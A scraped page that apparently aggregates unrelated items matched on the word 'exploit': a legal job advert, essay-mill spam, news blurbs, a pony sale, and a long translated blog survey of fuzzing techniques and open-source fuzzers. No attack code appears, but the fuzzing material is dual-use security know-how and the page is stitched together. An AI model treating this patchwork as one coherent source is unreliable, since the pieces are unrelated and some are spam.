
Legal Counsel - Trade Publishing

A super new opportunity has arisen with a highly successful London based trade publisher for a talented and motivated Legal Counsel.  This role will support the Head of Legal to provide legal services to the London office and its trading divisions.  This is a highly responsible role and would suit a commercially-minded qualified legal professional, looking for an opportunity to bring their experience to a major publishing organisation.

Reporting to the Head of Legal, the Legal Counsel will provide accessible, commercial and technically strong advice to the various business divisions of the organisation and the role will involve reviewing, drafting, negotiating and advising on a wide range of commercial contracts/arrangements, including the acquisition and exploitation of intellectual property rights (including licences and a variety of publishing contracts), plus, distribution agreements, digital media contracts, IT contracts, Cloud computing, content acquisition, and author/editor contracts. 

The Legal Counsel will develop and review standard contract templates and terms and conditions and will also be involved with on-going review and maintenance of policies, procedures and controls and associated mechanisms to support strategic goals and to ensure compliance with applicable rules, regulations and laws.

You will play a fundamental and proactive role in developing the legal team, both in relation to enhancing the support provided by the legal team to the business and also in promoting best practice and contributing to the overall performance of the legal team itself.

This is a key position in the team and the successful person will be LLB, BVC or LPC qualified and a member of the Law Society or Bar Council, and will have a minimum of 5 years post qualified experience in private practice or in-house.  Experience from the publishing/media, or similar industry would be an advantage.  You will be commercially focused with excellent drafting skills, along with strong written and oral communication skills, and able to efficiently manage your workload and projects within set timelines and to budget.

For more detailed information please contact me on 0207 048 6223 for a confidential call, or email your details to me at theresa@redwoodrecruitment.com

Reference: LC091018
Company:
Location (from list): London, UK
Employment type: Permanent
Type: Specialist, Licensing
Job sector: Professional, Trade
Required languages: English
Required skills: 5 years PQE in private practice or in house, Legal experience within the publishing/media sector
Application email:
Salary description: Very attractive salary plus bonus and generous benefits package

Buy Essays Cheap at a Glance
Buy Essays Cheap at a Glance Ruthless Buy Essays Cheap Strategies Exploited You will need to upload the paperwork as an alternative to placing them Whether it’s an online writing portfolio. During your faculty knowledge, you’re going to be expected to write kinds paper writing online and many fashions of essays and the custom writing … Continue reading "Buy Essays Cheap at a Glance"
Pentagon slow to protect weapon systems from cyber threats: U.S. agency
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

Systems Maintenance Technician and Trainer - Leidos - Virginia Beach, VA
Recent Operational experience in Ships Signals Exploitation Space (SSES) aboard CG, DDG, or LPD class ships....
From Leidos - Thu, 04 Oct 2018 17:07:40 GMT
Windows 10 v1803 and KB4462919: what's new?

On the occasion of the October 2018 Patch Tuesday, Microsoft is releasing KB4462919 for PCs running Windows 10 v1803. This cumulative update addresses security and fixes problems. Installing KB4462919 brings the operating system to build 17134.345. This number matters because it lets you check that ...

The post "Windows 10 v1803 and KB4462919: what's new?" appeared first on GinjFo.


Windows 10: KB4462919, KB4462918 and KB4462937 arrive

On the occasion of the October 2018 Patch Tuesday, Microsoft is releasing new cumulative updates for Windows 10. They target every supported version of the operating system. Patch Tuesday is Microsoft's big monthly software maintenance day. Through multiple cumulative updates it brings ...

The post "Windows 10: KB4462919, KB4462918 and KB4462937 arrive" appeared first on GinjFo.


Exclusive: Jessica Simpson Talks Personal Style, Baby No. 3 and Being a ‘Fashion Icon’ – Footwear News

Footwear News: Entertainers and fashion exploits have long gone hand in hand, but powerhouse singer Jessica Simpson has managed to crack a tough code. The actress, music star and mother (now expecting her third child) has built and sustained her billion-dollar … (Source: Fashion News by Google News)
An exploit obtains root permissions on any MikroTik router

Security is not exactly one of MikroTik's strong points. So far this year the manufacturer has been in the news over a series of vulnerabilities in its routers, security flaws that have allowed everything from using them to mine cryptocurrency to redirecting traffic to websites controlled by attackers. Today, this manufacturer

The article "An exploit obtains root permissions on any MikroTik router" was published on RedesZone.


Hundreds of scientists, leaders in Lapland for Arctic Biodiversity Congress

Finland is hosting the Arctic Biodiversity Congress this week, where 450 scientists, government officials, indigenous peoples and experts from 26 countries are discussing safeguarding the Arctic environment. Finland is chair of the Arctic Council from 2017-2019, and hosting two high-level environmental meetings this month.

Finnish President Sauli Niinistö was also in attendance at this week's congress, which began, well, above the Arctic Circle, in Lapland's city of Rovaniemi on Tuesday.

Niinistö opened the four-day congress by pointing out what was likely already on many attendees' minds, a report issued Monday by the IPCC - the UN's Intergovernmental Panel on Climate Change - which said that avoiding global climate chaos will require an unprecedented transformation of society and the world economy, and that time is running out to avoid disaster.

The report called for radical cuts in energy consumption and a rapid shift away from fossil fuels.

"As we all know, the IPCC just yesterday published its latest special report on global warming. It had a very clear message to policymakers. We urgently need to enhance and speed up our efforts to achieve the goals of the Paris Climate Agreement," Niinistö said.

"This is particularly relevant for the Arctic. As the IPCC report points out, the Arctic region is one of the most vulnerable systems on our planet, if and when global warming continues. And on the other hand, the melting of sea ice and other changes in the Arctic region accelerate climate change on a global scale. I have said this before: if we lose the Arctic, we lose the globe," Niinistö continued.

Finland seeks action from Arctic states

Niinistö also said Finland would like to see Arctic states, at "the highest political level commit to reducing black carbon emissions. Reducing flaring in oil and gas production, switching from heavy fuels to LNG in ship engines, upgrading old-fashioned power plants, and preventing wildfires."

"The discussions I have had preparing for the possible [Arctic] summit have given me reason for some optimism. Climate change may not be the best conversation starter in every capital these days, but you can still find constructive ways to address the concrete issues behind it," Niinistö said.

"There is hope. We still have a chance to save the Arctic, and to save the globe. But there is no time to waste," he said.

Biodiversity in the Arctic

This week's congress will feature keynote speeches from prominent experts in Arctic science and policy, and global environmental cooperation.

The environment ministry's councillor on environmental biodiversity, Marina Von Weissenberg, is one of the conference organisers and said she has high hopes for the meeting, adding that the IPCC report will likely spark debate at this week's meeting.

"There will certainly be a great deal of discussion. We know that climate change is the biggest threat to the Arctic region. The official goal is [an overall] global warming limit of 1.5 degrees, which in the Arctic region means an increase in temperature of between 6-7 degrees. It is clear that the flora and fauna will suffer terribly," she said.

"I hope that the topics discussed at the conference give a little nudge to the UN system, that we have to follow up on agreements we've made on biological diversity and transport sector regulations," von Weissenberg said.

The meeting will also feature scientific reports on the acidification of the Arctic Sea and how environmental toxins are affecting fish and other marine life.

Science rules at Arctic Council

Although research is not always taken into consideration by policy makers, von Weissenberg said the Arctic Council listens to researchers.

"The Arctic Council has done a great job. It has been a joy to observe cooperation between, for example the US, Canada, Finland and Russia, which is based on the best scientific data available," von Weissenberg said.

The Arctic region is one of the areas on the planet least affected by humans, but it is also threatened by global climate change and exploitation of resources. Local communities, as well as indigenous peoples rely on the Arctic for their livelihoods but climate change in the region also poses serious threats for the entire world, according to von Weissenberg.

"Even though it's a small number of countries we're talking about [in the Arctic region], the polar region impacts the condition of the entire planet," she said.


Coming Thursday: How an Acclaimed American Charity Failed Some of the World’s Most Vulnerable Girls

Katie Meyler captivated Americans with the stories of girls she met in Monrovia, Liberia, who she said were so poor that they had to sell their bodies just to buy clean drinking water. Her social media followers gave her money to send them to school. She started a charity called More Than Me, and in 2012 she won $1 million live on NBC to build a school of her own.

Her charity was created to save these vulnerable girls from sexual exploitation. But from the very beginning, girls were being raped by a man Meyler trusted. He was a former child soldier, the charity’s first staff member and, at one point, Meyler’s lover. After a yearlong ProPublica investigation, reporter Finlay Young delves into the question of who is responsible when those who help also cause enduring and irreversible harm.

The story and an accompanying documentary will publish on Oct. 11, in partnership with Time magazine. Sign up below and we'll email it to you when it goes live.


YOUNG MINISTERS RETREAT 2018
DESCRIPTION YOUNG MINISTERS RETREAT 2018 Theme: Explosive Exploits (72 Hours Firerization) Ministeri
Chorus subcontractors exploited - First Union

Subcontractors working for broadband installer Chorus have been exploiting migrant workers, taking their cash and promising visas in return. Chorus chief executive Kate McKenzie said the company had no idea its subcontractors had been doing this and it was working to fix the problem. First Union general secretary Dennis Maga says the problem is rife within the industry, with migrants afraid to speak out for fear of being deported. He says Chorus should take some responsibility for the problem.
Women have been worst sufferers of mob violence due to religious intolerance: Nayantara Sahgal

Describing fundamentalism as a frontal attack on humanity, eminent writer Nayantara Sahgal on Tuesday said women have been the worst sufferers of mob violence that occurred due to religious intolerance.

Delivering the 24th Justice Sunanda Bhandare Memorial Lecture on "Women under Religious Fundamentalism", Ms. Sahgal lamented that India has today become the world's most dangerous country for women. Citing the instances of mob violence resulting in the rape of women during the partition of India and later, during the Bangladesh liberation war, Mrs Sahgal said women have been the worst sufferers of mob violence that occurred due to religious intolerance.

Speaking at the event, graced by eminent dignitaries including former Prime Minister Manmohan Singh, Mr A. K. Sikri, Judge, Supreme Court of India, and Mr. Rajendra Menon, Chief Justice, Delhi High Court, the writer said religious fundamentalism is against the spirit of our Constitution. "The Constitution of India has granted equal rights to all, irrespective of their caste, religion and sex. India is one of the few countries where women have had the right to vote since it became a Republic. Religious fundamentalism is against the spirit of our Constitution. It is a frontal attack on humanity," she said.

Ms. Sahgal said that the late Justice Bhandare made a distinct mark in a predominantly man's world. "She understood a judge's role as a sentinel of progress in a developing society. She believed that a woman's place in society marks the level of civilization," Mrs Sahgal said.

Speaking on this occasion, Chief Guest Justice A. K. Sikri, Judge, Supreme Court of India, reminisced about his acquaintance with Justice Sunanda Bhandare. He considered it a pleasant task to speak about Justice Bhandare, who commanded the respect of the young Bar and was called by them the "Mother Bench".

Justice Rajendra Menon, Chief Justice of Delhi High Court, presided over the meeting, which was attended by judges, advocates, professors, students, activists and representatives of civil society organisations.

This year, the Justice Sunanda Bhandare Award was conferred on the Naz Foundation (India) Trust for its sustained campaign on equal rights for all, its remarkable work in empowering girls and ensuring their capacity building, its consistent endeavour in educating the public about the prevention of HIV transmission, and its petition first in the Delhi High Court and then the curative petitions and interventions in the Supreme Court of India that resulted in the eventual decriminalization of Section 377.

Every year, the Memorial Lecture is organized by the Justice Sunanda Bhandare Foundation to perpetuate the memory of the late Justice Bhandare, a renowned judge of the Delhi High Court who was sensitive to issues involving the exploitation of women, children and weaker sections of society.
Listing: NEW FOREST PONY - 11 YEARS

TAREK D'AVETTE – NEW FOREST. Born 03/07/2007 – 1.42 m. Versatile pony, very good dressage level. Ideal for riding school, competition (club/amateur) and leisure. Driven solo, in pairs, tandem and team. Excellent temperament, reliable, safe, loads and travels very well. I am selling this very good pony for lack of time to make full use of his qualities. PRICE: €4,500. For any information: Laurent DERVIEUX – 06.29.88.26.43 attelagesdeceuze@free.fr
Illegal alien men sneak children into US to exploit ‘family loophole’

The Washington Times reports, “Men now make up about 40 percent of illegal immigrant parents trying to sneak children into the U.S., as they leap to take advantage of the “family loophole” that means illegal immigrants who come with children get treated more leniently.” Pointing to a Border Patrol report, fraud has also soared. From […]

The post Illegal alien men sneak children into US to exploit ‘family loophole’ appeared first on The Hayride.


Summary of fuzzing techniques and a list of tools

Copyright notice: this is an original article by the blogger; reproduction without the blogger's permission is prohibited. https://blog.csdn.net/wcventure/article/details/82085251

First, I recommend reading the 2018 Computing Surveys paper "Fuzzing: Art, Science, and Engineering":
https://github.com/wcventure/wcventure/blob/master/Paper/Fuzzing_Art_Science_and_Engineering.pdf
Next, the 2018 Cybersecurity paper "Fuzzing: a survey":
https://www.researchgate.net/publication/325577316_Fuzzing_a_survey
Both give a detailed introduction to fuzzing techniques and fuzzing tools.

I. What is fuzzing?

The word "fuzz" originally means fluff, fine hair, or to make something blurry. It was later adopted in software testing, where in Chinese it is usually rendered as 模糊测试 ("fuzzy testing") and in English as "fuzzing" or "fuzz testing". This article uses "fuzzing".

Fuzzing can be traced back to 1950, when computer data was mainly stored on punched cards and programs read those cards to compute and produce output. If a program encountered garbage cards or discarded, mismatched cards, it could produce errors, exceptions or even crashes, and that is how bugs were found. Fuzzing is therefore not a new technique but an old testing technique that arose together with computers themselves.

Fuzzing is a black-box (or grey-box) testing technique that discovers unknown vulnerabilities in a product or protocol by automatically generating and executing large numbers of random test cases. Fuzzing has kept evolving as computers have.

II. Is fuzzing useful?

Fuzzing is "fuzzy testing": as the name suggests, the test cases are indeterminate and fuzzy.

Computing is a precise science and technology, and testing should be the same: for a given input there should be a definite expected output. How can there be fuzzy, indeterminate test cases, and what exactly are they good for?

I think the main reasons indeterminate test cases exist are the following:

1. We cannot enumerate every input as a test case. When writing test cases we usually consider common scenarios such as positive and negative tests, boundary values, and over-long or over-short inputs, but there is no way to walk through every possible input.

2. We cannot think of every possible abnormal scenario. Human brainpower is limited, and we cannot imagine every combination of abnormal conditions, especially now that software depends more and more on operating systems, middleware and third-party components; bugs in those systems, or bugs that only appear in combination, cannot be foreseen by the developers and testers of any one project team.

3. Fuzzing software cannot traverse every abnormal scenario either. Software keeps growing more complex and the space of possible inputs is effectively infinite, so even exhaustive traversal by software is impossible; otherwise the release would never ship. Fuzzing fundamentally relies on random functions to generate random test cases, so it is indeterminate by nature.

Will these indeterminate test cases give us the results we want? Can they find real bugs?

1. Fuzzing is first of all an automation technique: software automatically executes relatively random test cases. Because a program does the execution, test throughput is several orders of magnitude higher than a human's. An excellent tester might execute a few dozen test cases a day, rarely reaching 100, whereas a fuzzing tool can easily execute hundreds in a few minutes.

2. Fuzzing relies on random functions to generate test cases; randomness means no repetition and no predictability, and hence possibly unexpected inputs and results.

3. By the law of large numbers in probability theory, if we repeat enough times with enough randomness, even extremely improbable events are bound to occur. Fuzzing is a textbook application of the law of large numbers: with enough test cases and enough randomness, deeply hidden bugs that rarely surface become inevitable.

Today fuzzing is one of the most effective means in software testing and vulnerability discovery. It is particularly suited to finding 0-day vulnerabilities and is the first-choice technique of many hackers and black hats. Although fuzzing does not by itself achieve an intrusion, it makes it very easy to find vulnerabilities in software or systems, and using those as a starting point for deeper analysis makes finding an intrusion path much easier; that is why hackers like fuzzing.

III. Generation-based and mutation-based fuzzing algorithms

Fuzzing engines generate test cases in two main ways:
1) Mutation-based: generate new test cases by mutating known sample data;
2) Generation-based: model the known protocol or interface specification and generate test cases from the model;
Typical fuzzing tools combine both approaches.

The core requirement of a mutation-based algorithm is to learn the existing data model: starting from existing data and its analysis, it generates random data to serve as test cases.

IV. State-of-the-art AFL

AFL is the famous mutation-based fuzzer.
Some material on state-of-the-art AFL:

  1. american fuzzy lop (2.52b)
    http://lcamtuf.coredump.cx/afl/
  2. Notes on AFL internals
    http://rk700.github.io/2017/12/28/afl-internals/
  3. afl-fuzz technical whitepaper
    https://blog.csdn.net/gengzhikui1992/article/details/50844857
  4. How to run a complete fuzzing session with AFL
    https://blog.csdn.net/abcdyzhang/article/details/53487683
  5. AFL (American Fuzzy Lop) implementation details and file mutation
    https://paper.seebug.org/496/
  6. Fuzzing in practice with libFuzzer
    https://www.secpulse.com/archives/71898.html

[Figure T1: static analysis, dynamic analysis, symbolic execution, fuzzing]

[Figure T2: generation-based fuzzing, mutation-based fuzzing]

[Figure T3: white-box fuzzing, grey-box fuzzing, black-box fuzzing]

[Figure T4: key elements of fuzzing]

[Figure T5: "Fuzzing 中" (caption truncated in the source)]

[Figure F1: citation relationships among fuzzing-tool papers to date; classification and history of fuzzing tools]

[Figure F2: survey of fuzzing tools, with a well-organised chart]

Finally, a list of some open-source fuzzing tools.
Original source: [https://www.peerlyst.com/posts/resource-open-source-fuzzers-list], extended with the newest 2018 tools such as CollAFL and SnowFuzz.
1. Open-source fuzzers
2. Fuzzing harnesses or frameworks
3. Other fuzzers that are free but, compared with open source, not worth mentioning
4. Fuzzing payloads
5. Blogs that will help you understand fuzzing better
6. Other fuzzing blogs or resources
7. Commercial fuzzers

1. Open-source fuzzers

CollAFL
http://chao.100871.net/papers/oakland18.pdf
A path-sensitive fuzzer that resolves the bitmap path-collision problem in AFL.
It also proposes a seed-selection strategy that raises coverage faster.

SnowFuzz
https://arxiv.org/pdf/1708.08437.pdf

VUzzer
http://www.cs.vu.nl//~giuffrida/papers/vuzzer-ndss-2017.pdf
An application-aware evolutionary fuzzer. In this paper we propose an application-aware evolutionary fuzzing strategy that needs no prior knowledge of the application or its input format. To maximise coverage and explore deeper paths, we use control- and data-flow features obtained from static and dynamic analysis to infer fundamental properties of the application. Compared with application-agnostic approaches, this generates interesting inputs much faster. We implement our fuzzing strategy in VUzzer and evaluate it on three data sets: the DARPA Cyber Grand Challenge (CGC) binaries, a set of real-world applications (binary input parsers), and the recently released LAVA data set.

Afl-fuzz (American fuzzy lop)
http://lcamtuf.coredump.cx/afl/
Afl-fuzz is a security-oriented fuzzer that uses a novel approach (compile-time instrumentation and genetic algorithms) to automatically discover clean, interesting test cases that trigger new internal states in the target binary. This substantially improves the functional coverage of the fuzzed code. The compact synthesised corpora it produces can also be used to seed other, more labour- or resource-intensive testing regimes.
Compared with other instrumented fuzzers, afl-fuzz is designed to be practical: it has modest performance overhead, uses a variety of highly effective fuzzing strategies and effort-minimisation tricks, requires essentially no configuration, and seamlessly handles complex real-world cases such as common image parsing or file compression libraries.

Filebuster
A very fast and flexible web fuzzer

TriforceAFL
AFL/QEMU fuzzer with full-system emulation. This is a patched version of AFL that supports full-system fuzzing using QEMU. The bundled QEMU has been updated to allow branch tracing when running the x86_64 system emulator. It also adds extra instructions to start AFL's forkserver, perform fuzz setup, and mark the start and stop of a test case.

Nightmare:
https://github.com/joxeankoret/nightmare
A distributed fuzzing suite with web administration.

Grr
High-throughput fuzzer and emulator for DECREE binaries

Randy:
http://ptrace-security.com/blog/randy-random-based-fuzzer-in-python/
A random-based fuzzer in Python

IFuzzer
An evolutionary interpreter fuzzer

Dizzy:
https://github.com/ernw/dizzy
A Python-based fuzzing framework:
1. Can send at L2 as well as at upper layers (TCP / UDP / SCTP)
2. Can handle odd-length packet fields (no need to match byte boundaries, so even single flags or 7-bit-long words can be represented and fuzzed)
3. Very easy protocol definition syntax
4. Can fully fuzz multi-packet state, and can use data received from the target in responses

Address Sanitizer:
https://github.com/Google/sanitizers
AddressSanitizer, ThreadSanitizer, MemorySanitizer

Diffy:
https://github.com/twitter/diffy
Use Diffy to find potential bugs in your services

Wfuzz:
https://github.com/xmendez/wfuzz
Web application fuzzer: HTTP://www.edge-security.com/wfuzz.php

Go-fuzz:
https://github.com/Google/gofuzz
Fuzz testing for Go

Sulley:
https://github.com/OpenRCE/sulley
Sulley is an actively developed fuzzing engine and fuzz testing framework consisting of multiple extensible components. Sulley (IMHO) exceeds the capabilities of most previously published fuzzing technologies, commercial and public domain. The goal of the framework is to simplify not only data representation but also data transmission and instrumentation. Sulley is named after the creature from Monsters Inc., because he is fuzzy. Written in Python.

Sulley_l2:
http://ernw.de/download/sulley_l2.tar.bz2
Some may remember sulley_l2, released in 2008: a modified version of the Sulley fuzzing framework with enhanced layer-2 sending capabilities and a bunch of (L2) fuzzing scripts. All the blinking, rebooting and mem-corrupting got us some attention. Since then we have continued to write and use these fuzzing scripts, so the collection of holes has grown.

CERT Basic Fuzzing Framework (BFF), for Linux and OS X
https://github.com/CERTCC-Vulnerability-Analysis/certfuzz
http://www.cert.org/vulnerability-analysis/tools/bff.cfm
The CERT Basic Fuzzing Framework (BFF) is a software testing tool that finds defects in applications running on the Linux and Mac OS X platforms. BFF performs mutational fuzzing on software that consumes file input. (Mutational fuzzing is the act of taking well-formed input data and corrupting it in various ways, looking for cases that cause crashes.) BFF automatically collects test cases that cause software to crash in unique ways, together with debugging information associated with the crashes. The goal of BFF is to minimise the effort required for software vendors and security researchers to efficiently discover and analyse security vulnerabilities found via fuzzing.

CERT Failure Observation Engine (FOE), for Windows
http://www.cert.org/vulnerability-analysis/tools/foe.cfm
https://github.com/CERTCC-Vulnerability-Analysis/certfuzz
The CERT Failure Observation Engine (FOE) is a software testing tool that finds defects in applications running on the Windows platform. FOE performs mutational fuzzing on software that consumes file input. (Mutational fuzzing is the act of taking well-formed input data and corrupting it in various ways, looking for cases that cause crashes.) FOE automatically collects test cases that cause software to crash in unique ways, together with debugging information associated with the crashes. The goal of FOE is to minimise the effort required for software vendors and security researchers to efficiently discover and analyse security vulnerabilities found via fuzzing.

Dranzer, for ActiveX controls
https://github.com/CERTCC-Vulnerability-Analysis/dranzer
Dranzer is a tool that enables users to examine effective techniques for fuzz testing ActiveX controls.

Radamsa, a general-purpose fuzzer
https://github.com/aoh/radamsa
Radamsa is a test-case generator for robustness testing, also known as a fuzzer. It can be used to test how well a program withstands malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them, which are then fed to the target program either directly or via some script. Radamsa's main selling points over other fuzzers are that it is very easy to run on most machines and easy to script from the command line, and it has already been used to find a range of security problems in programs you may be using right now.

zzuf, application fuzzer
https://github.com/samhocevar/zzuf
zzuf is a transparent application input fuzzer. It works by intercepting file operations and changing random bits in the program's input. zzuf's behaviour is deterministic, making it easy to reproduce bugs. For instructions and examples on how to use zzuf, see the manual page and the website http://caca.zoy.org/wiki/zzuf

Backfuzz
https://github.com/localh0t/backfuzz
Backfuzz is a fuzzing tool written in Python for different protocols (FTP, HTTP, IMAP, etc.). The general idea is that the script has several predefined functions, so anyone who wants to write their own plugin (for another protocol) can do so in a few lines.

KEMUfuzzer
https://github.com/jrmuizel/kemufuzzer
KEmuFuzzer is a tool for testing system virtual machines based on emulation or direct native execution. KEmuFuzzer currently supports Bochs, QEMU, VMware and VirtualBox.

Pathgrind
https://github.com/codelion/pathgrind
Pathgrind uses path-based dynamic analysis to fuzz Linux/Unix binaries. It is based on Valgrind and written in Python.

Wadi-fuzzer
https://www.sensepost.com/blog/2015/wadi-fuzzer/
https://gitlab.sensepost.com/saif/DOM-Fuzzer
Wadi is a web-browser grammar-based fuzzer. The grammar describes how a browser should process web content; Wadi turns that around and uses the grammar to break browsers.
Wadi is a fuzzing module for the NodeFuzz fuzzing harness and leverages AddressSanitizer (ASan) for testing on Linux and Mac OS X.
The World Wide Web Consortium (W3C) is an international organisation that develops open standards to ensure the long-term growth of the Web. W3C lets us search the grammars and use them in our test cases.

LibFuzzer, Clang-format-fuzzer, clang-fuzzer
http://llvm.org/docs/LibFuzzer.html
http://llvm.org/viewvc/llvm-project/cfe/trunk/tools/clang-format/fuzzer/ClangFormatFuzzer.cpp?view=markup
http://llvm.org/viewvc/llvm-project/cfe/trunk/tools/clang-fuzzer/ClangFuzzer.cpp?view=markup
We implemented two fuzzers on top of LibFuzzer: clang-format-fuzzer and clang-fuzzer. Clang-format is mostly a lexer, so feeding it random bytes worked perfectly and turned up more than 20 bugs. Clang, however, is much more than a lexer, and random bytes barely scratch its surface, so in addition to random bytes we also fuzzed Clang in a token-aware mode. Bugs were found in both modes; some had previously been found by AFL, others had not. We ran this fuzzer with AddressSanitizer, and some of the bugs would not have been easy to find without it.

Perf-fuzzer
http://www.eece.maine.edu/~vweaver/projects/perf_events/validation/
https://github.com/deater/perf_event_tests
http://web.eece.maine.edu/~vweaver/projects/perf_events/fuzzer/
Test suite for the Linux perf_event subsystem

HTTP/2 Fuzzer
https://github.com/c0nrad/http2fuzz
HTTP/2 fuzzer written in Go.

QuickFuzz
http://quickfuzz.org/
QuickFuzz is a grammar fuzzer that uses QuickCheck, Template Haskell and specific Hackage libraries to generate many complex file formats such as JPEG, PNG, SVG, XML, ZIP, TAR and more! QuickFuzz is open source (GPL3) and can work together with other bug-detection tools such as zzuf, radamsa, honggfuzz and valgrind.

SymFuzz
https://github.com/maurer/symfuzz
http://ieeexplore.IEEE.org/xpls/abs_all.jsp?arnumber=7163057
Abstract: We present an algorithm design that maximises the number of bugs found by black-box mutational fuzzing given a program and a seed input. The key intuition is to use white-box symbolic analysis on an execution trace for the given program-seed pair to detect dependencies among the bit positions of the input, and then use those dependencies to compute a probabilistically optimal mutation ratio for that program-seed pair. Our results are promising: with the same fuzzing time, we find 38.6% more bugs on average than three previous fuzzers across eight applications.

OFuzz
https://github.com/sangkilc/ofuzz
OFuzz is a fuzzing platform written in OCaml. OFuzz currently focuses on file-processing applications running on *nix platforms. Its main design principle is flexibility: it must be easy to add or replace fuzzing components (crash triage modules, test-case generators, etc.) or algorithms (mutation algorithms, scheduling algorithms).

Bed
http://www.snake-basket.de/
Network protocol fuzzer. BED is a program designed to check daemons for potential buffer overflows, format string bugs and the like.

Neural Fuzzer
https://cifasis.github.io/neural-fuzzer/
The Neural Fuzzer is an experimental fuzzer designed to use state-of-the-art machine learning to learn from an initial set of files. It works in two phases: training and generation.

Pulsar
https://github.com/hgascon/pulsar
Protocol learning, simulation and stateful fuzzer
Pulsar is a network fuzzer with automatic protocol learning and simulation capabilities. The tool allows a protocol to be modelled with machine-learning techniques such as clustering and hidden Markov models. These models can be used to simulate communication between Pulsar and a real client or server, and those messages, combined with a series of fuzzing primitives, allow the implementation of an unknown protocol to be tested for bugs in deeper protocol states.

D-bus fuzzer:
https://github.com/matusmarhefka/dfuzzer
dfuzzer is a D-Bus fuzzer, a tool for fuzz testing processes that communicate over D-Bus. It can be used to test processes connected to the session bus and to the system bus daemon. The fuzzer works as a client: it first connects to the bus daemon and then walks and fuzzes all the methods provided by a D-Bus service.

Choronzon
https://census-labs.com/news/2016/07/20/choronzon-public-release/
Choronzon is an evolutionary fuzzing tool. It tries to imitate the evolutionary process in order to keep producing better results. To achieve this, it has an evaluation system that classifies which fuzzed files are interesting and which should be discarded.
Furthermore, Choronzon is a knowledge-based fuzzer. It uses user-defined information to read and write files of the target file format. To get familiar with Choronzon's terminology, consider that each file is represented by a chromosome. The user should describe the basic structure of the file format under consideration; a high-level overview of the format is preferred over describing every detail and aspect of it. Each of those user-defined basic structures is considered a gene; each chromosome contains a tree of genes, and Choronzon is able to build the corresponding file from it.

Exploitable
'exploitable' is a GDB extension that classifies Linux application bugs by severity. The extension inspects the state of a Linux application that has crashed and outputs a summary of how difficult it would be for an attacker to exploit the underlying software bug to gain control of the system. The extension can be used to prioritise bugs for software developers so that they can address the most severe ones first.
The extension implements a GDB command named "exploitable". The command uses heuristics to describe the exploitability of the state of the application currently being debugged in GDB. It is intended for Linux platforms and GDB versions that include the GDB Python API. Note that at this time the command will not run correctly on core-file targets.

Hodor

We wanted to design a general-purpose fuzzer that can be configured to use known good inputs and delimiters in order to fuzz specific locations. It sits somewhere between a completely dumb fuzzer and something smarter, at far less effort than implementing a proper smart fuzzer.

BrundleFuzz
https://github.com/carlosgprado/BrundleFuzz
BrundleFuzz is a distributed fuzzer for Windows and Linux that uses dynamic binary instrumentation.

Netzob
https://www.netzob.org/
Open-source tool for reverse engineering, traffic generation and fuzzing of communication protocols

PassiveFuzzFrameworkOSX
This framework is used to fuzz OS X kernel vulnerabilities based on a passive inline hooking mechanism in kernel mode.

syntribos
Python API security testing tool from the OpenStack Security Group

honggfuzz
http://google.github.io/honggfuzz/
A general-purpose, easy-to-use fuzzer with interesting analysis options. Supports feedback-driven fuzzing based on code coverage.

dotdotpwn
http://dotdotpwn.blogspot.com/
Directory traversal fuzzer

KernelFuzzer
Cross-platform kernel fuzzer framework. DEF CON 24 video:
https://www.youtube.com/watch?v=M8ThCIfVXow

PyJFuzz
PyJFuzz - Python JSON Fuzzer
PyJFuzz is a small, extensible and ready-to-use framework for fuzzing JSON inputs, such as mobile endpoint REST APIs, JSON implementations, browsers, CLI executables and more.

RamFuzz
A fuzzer for individual method parameters.

EMFFuzzer
Enhanced metafile fuzzer based on the Peach fuzzing framework

js-fuzz
An AFL-inspired genetic fuzz tester written in JavaScript.

syzkaller
syzkaller is an unsupervised, coverage-guided Linux system-call fuzzer.

2. Fuzzing harnesses/frameworks that make fuzzers better:

FuzzFlow
Fuzzflow is a distributed fuzzing management framework from Cisco Talos that provides virtual machine management, fuzz job configuration, pluggable mutation engines, pre/post mutation scripts, crash collection and pluggable crash analysis.

fuzzinator
Fuzzinator is a fuzz testing framework that helps you automate the tasks usually needed in a fuzz session:
running your favourite test generator and feeding the test cases to the system under test,
catching and saving unique issues,
reducing failing test cases,
easing issue reporting in bug trackers (e.g. Bugzilla or GitHub),
regularly updating the SUT if needed,
scheduling multiple SUTs and generators without overloading the workstation.

Fuzzlabs
https://github.com/DCNWS/FuzzLabs
FuzzLabs is a modular fuzzing framework written in Python. It uses a modified version of the amazing Sulley fuzzing framework as its core engine. FuzzLabs is still under development.

Nodefuzz
https://github.com/attekett/NodeFuzz
For Linux and Mac OS X. NodeFuzz is a fuzzer for web browsers and browser-like applications. There are two main ideas behind NodeFuzz: first, to create a simple, fast way to fuzz different browsers; second, to have a harness that can easily be extended with new test-case generators and client instrumentation without modifying the core.

Grinder
https://github.com/stephenfewer/grinder
For Windows
Grinder is a system for automating the fuzzing of web browsers and managing large numbers of crashes.

Kitty
https://github.com/Cisco-sas/kitty
Kitty is an open-source modular and extensible fuzzing framework written in Python, inspired by OpenRCE's Sulley and Michael Eddington's (now Deja vu Security's) Peach Fuzzer.

Peach
http://community.peachfuzzer.com/
https://github.com/MozillaSecurity/peach
Peach is a SmartFuzzer capable of performing both generation-based and mutation-based fuzzing.

3. In addition, there are these free but not open-source fuzzers:

SDL MiniFuzz File Fuzzer
https://www.Microsoft.com/en-us/download/details.aspx?id=21769
For Windows. SDL MiniFuzz File Fuzzer is a basic file fuzzing tool designed to ease the adoption of fuzz testing by non-security developers who are unfamiliar with file fuzzing tools or have never used them in their current software development processes.

Rfuzz
http://rfuzz.rubyforge.org/index.html
RFuzz is a Ruby library that makes it easy to test web applications from the outside using a fast HttpClient and a wicked evil RandomGenerator, allowing ordinary programmers to use advanced fuzzing techniques every day.

Spike
http://www.immunitysec.com/downloads/SPIKE2.9.tgz
SPIKE is an API framework that lets you write fuzzers.

Regex Fuzzer
http://go.microsoft.com/?linkid=9751929
SDL Regex Fuzzer is a verification tool that helps test regular expressions for potential denial-of-service vulnerabilities. Regular expression patterns containing certain clauses that execute in exponential time (for example, grouping clauses that are themselves repeated) can be exploited by an attacker to cause a denial-of-service (DoS) condition. SDL Regex Fuzzer integrates with the SDL Process Template and the MSF-Agile + SDL Process Template to help users track and eliminate any detected regular-expression vulnerabilities in their projects.

4. Blogs that will help you fuzz better
Fuzzing yaml from start to finish with AFL (a complete fuzz job, by foxglovesecurity)
http://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/

Fuzz smarter, not harder: an AFL primer from BSidesSF 2016
